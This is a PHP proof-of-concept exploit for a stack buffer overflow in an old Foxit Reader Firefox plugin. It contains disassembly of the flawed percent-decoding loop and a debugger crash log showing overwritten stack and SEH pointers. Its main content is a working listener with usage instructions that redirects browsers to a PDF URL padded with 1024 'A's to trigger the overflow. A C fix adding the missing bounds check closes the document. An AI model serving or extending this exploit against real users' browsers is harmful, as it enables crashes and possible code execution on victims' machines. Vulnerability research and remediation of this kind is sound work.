<?php
/*
Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll
Overlong Query String Remote Stack Buffer Overflow PoC
---------------------------
rgod (listener)

Tested against Microsoft Windows
  Mozilla Firefox 17.0.1
  Foxit Reader 5.4.3.0920
  Foxit Reader 5.4.4.1128

File:                    npFoxitReaderPlugin.dll
Version:                 2.2.1.530
Product url:             http://www.foxitsoftware.com/downloads/
Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage: Launch from the command line, then browse port 6666 with Firefox.
You can also test it through this url:

  http://192.168.0.1/x.pdf?[A x 1024]

The file must exist, or the server must respond with the proper
Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------
L1000162F:
  push ebx
  push esi
  push edi
  mov edi,ebp
  or ecx,FFFFFFFFh
  xor eax,eax
  xor ebx,ebx
  xor esi,esi
  repne scasb
  not ecx
  dec ecx
  test ecx,ecx
  jle L100016E4
L1000164A:
  mov al,[esi+ebp]
  mov word ptr [esp+18h],0000h
  cmp al,25h
  jz L10001661
  mov ecx,[esp+1Ch]
  mov [ebx+ecx],al
  jmp L100016CE
L10001661:
  mov al,[esi+ebp+01h]
  cmp al,30h
  jl L1000166D
  cmp al,39h
  jle L1000167D
L1000166D:
  cmp al,41h
  jl L10001675
  cmp al,46h
  jle L1000167D
L10001675:
  cmp al,61h
  jl L100016C6
  cmp al,66h
  jg L100016C6
L1000167D:
  mov dl,[esi+ebp+01h]
  inc esi
  inc esi
  lea ecx,[esp+10h]
  mov [esp+18h],dl
  push ecx
  mov al,[esi+ebp]
  lea edx,[esp+1Ch]
  push L100450D4
  push edx
  mov [esp+25h],al
  call SUB_L10006421
  mov eax,[esp+1Ch]
  lea ecx,[esp+24h]
  push eax
  push L100450D0
  push ecx
  call SUB_L100063CF
  mov eax,[esp+34h]
  mov dl,[esp+30h]
  add esp,00000018h
  mov [ebx+eax],dl
  jmp L100016CE
L100016C6:
  mov ecx,[esp+1Ch]
  mov byte ptr [ebx+ecx],25h
L100016CE:
  inc ebx
  mov edi,ebp
  or ecx,FFFFFFFFh
  xor eax,eax
  inc esi
  repne scasb
  not ecx
  dec ecx
  cmp esi,ecx
  jl L1000164A
L100016E4:
  mov edx,[esp+1Ch]
  pop edi
  pop esi
  mov eax,00000001h
  mov byte ptr [ebx+edx],00h
  pop ebx
  pop ebp
  pop ecx
  retn
;------------------------------------------------------------------------------

This copy loop (a percent-decoder that writes into the buffer at [esp+1Ch]
indexed by ebx, with no check against the destination's size) ends up
overwriting stack pointers; then (by attaching to plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8
eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
npFoxitReaderPlugin!NP_GetEntryPoints+0x15672:
10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=????????

... Attempt to write to address 41414141 ...

Also SEH pointers are overwritten.
*/

error_reporting(0);
set_time_limit(0);

$port = 6666;

// Any request that is not for the .pdf path is redirected to it with the
// overlong (1024 x "A") query string.
$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".
                "Server: Apache\r\n".
                "Location: /x.pdf?".str_repeat("A",1024)."\r\n".
                "Content-Type: text/html\r\n\r\n";

// Requests for the .pdf path get a response with the PDF Content-Type so the
// plugin is handed the URL (the plugin only needs the header, not a real file).
$____boom = "HTTP/1.1 200 OK\r\n".
            "Server: Apache\r\n".
            "Accept-Ranges: bytes\r\n".
            "Content-Length: 60137\r\n".
            "Content-Type: application/pdf\r\n".
            "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);
if (!$socket) {
    echo "$errstr ($errno)\n";
} else {
    echo "Listening on public tcp port ".$port." \n";
    while ($conn = stream_socket_accept($socket)) {
        // Only the request line is needed to decide which response to send.
        $line = fgets($conn);
        echo $line."\n";
        if (strpos($line, ".pdf")) {
            fwrite($conn, $____boom);
        } else {
            fwrite($conn, $____redirect);
        }
        fclose($conn);
    }
    fclose($socket);
}
?>
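The root cause in the disassembly above is a percent-decoding copy loop that indexes the destination buffer by ebx and never compares that index against the buffer's capacity. The following is an added example, not Foxit's code or the PoC author's: a bounded decoder with the same decoding rules (plain bytes copied, "%XX" decoded to one byte, anything else after '%' copied literally) that refuses to write past the destination and reports failure instead of corrupting the stack. The helper names (`url_decode_bounded`, `decode_matches`, `decode_fits`, `demo_overlong`) and the 64-byte destination size are assumptions chosen for the demonstration; the plugin's real buffer size is not given on the page.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Added example (not Foxit's code): a bounded version of the percent-decoding
 * copy loop shown in the disassembly. Plain bytes are copied, "%XX" with two
 * hex digits is decoded to one byte, anything else after '%' is copied
 * literally. Unlike the plugin's loop, the destination size is checked on
 * every write, so an overlong query string is rejected rather than written
 * past the end of the buffer. (The plugin's loop checks only the first digit
 * after '%'; this version requires both to be hex, which is stricter.) */

static int hex_val(unsigned char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode src into dst (capacity dst_len bytes, including the NUL).
 * Returns the number of bytes written, or -1 when the output would not fit.
 * dst is always NUL-terminated when dst_len > 0, even on failure. */
int url_decode_bounded(const char *src, char *dst, size_t dst_len)
{
    size_t in = 0, out = 0, n = strlen(src);

    if (dst_len == 0) return -1;

    while (in < n) {
        unsigned char c = (unsigned char)src[in];
        int hi = -1, lo = -1;

        if (out + 1 >= dst_len) {       /* the bound the plugin's loop lacks */
            dst[out] = '\0';
            return -1;
        }
        /* "%XX": needs two more bytes in the input, both hex digits */
        if (c == '%' && in + 2 < n &&
            (hi = hex_val((unsigned char)src[in + 1])) >= 0 &&
            (lo = hex_val((unsigned char)src[in + 2])) >= 0) {
            dst[out++] = (char)(hi * 16 + lo);
            in += 3;
        } else {
            dst[out++] = (char)c;
            in += 1;
        }
    }
    dst[out] = '\0';
    return (int)out;
}

/* Returns 1 when decoding src into a 256-byte buffer yields exactly expected. */
int decode_matches(const char *src, const char *expected)
{
    char buf[256];
    int r = url_decode_bounded(src, buf, sizeof buf);
    return r >= 0 && strcmp(buf, expected) == 0;
}

/* Decode src into a buffer of capacity dst_len (capped at 256) and return the
 * decoder's result, so callers can observe when the bound is hit. */
int decode_fits(const char *src, size_t dst_len)
{
    char buf[256];
    if (dst_len > sizeof buf) dst_len = sizeof buf;
    return url_decode_bounded(src, buf, dst_len);
}

/* Constructed input modelled on the PoC's query string: 1024 'A's decoded
 * into an assumed 64-byte destination. The bounded decoder returns -1. */
int demo_overlong(void)
{
    char query[1025];
    memset(query, 'A', 1024);
    query[1024] = '\0';
    return decode_fits(query, 64);
}

int main(void)
{
    char buf[32];
    int r = url_decode_bounded("a%41b", buf, sizeof buf);
    printf("\"a%%41b\" -> %d bytes: %s\n", r, buf);
    printf("1024 x 'A' into 64 bytes -> %d\n", demo_overlong());
    return 0;
}
```

The check that matters is the `out + 1 >= dst_len` test before every store; it is the comparison the loop at L1000164A never performs between ebx and the size of the buffer at [esp+1Ch]. Because the destination is NUL-terminated on both the success and failure paths, a caller that ignores the return value still gets a well-formed string rather than an unterminated one.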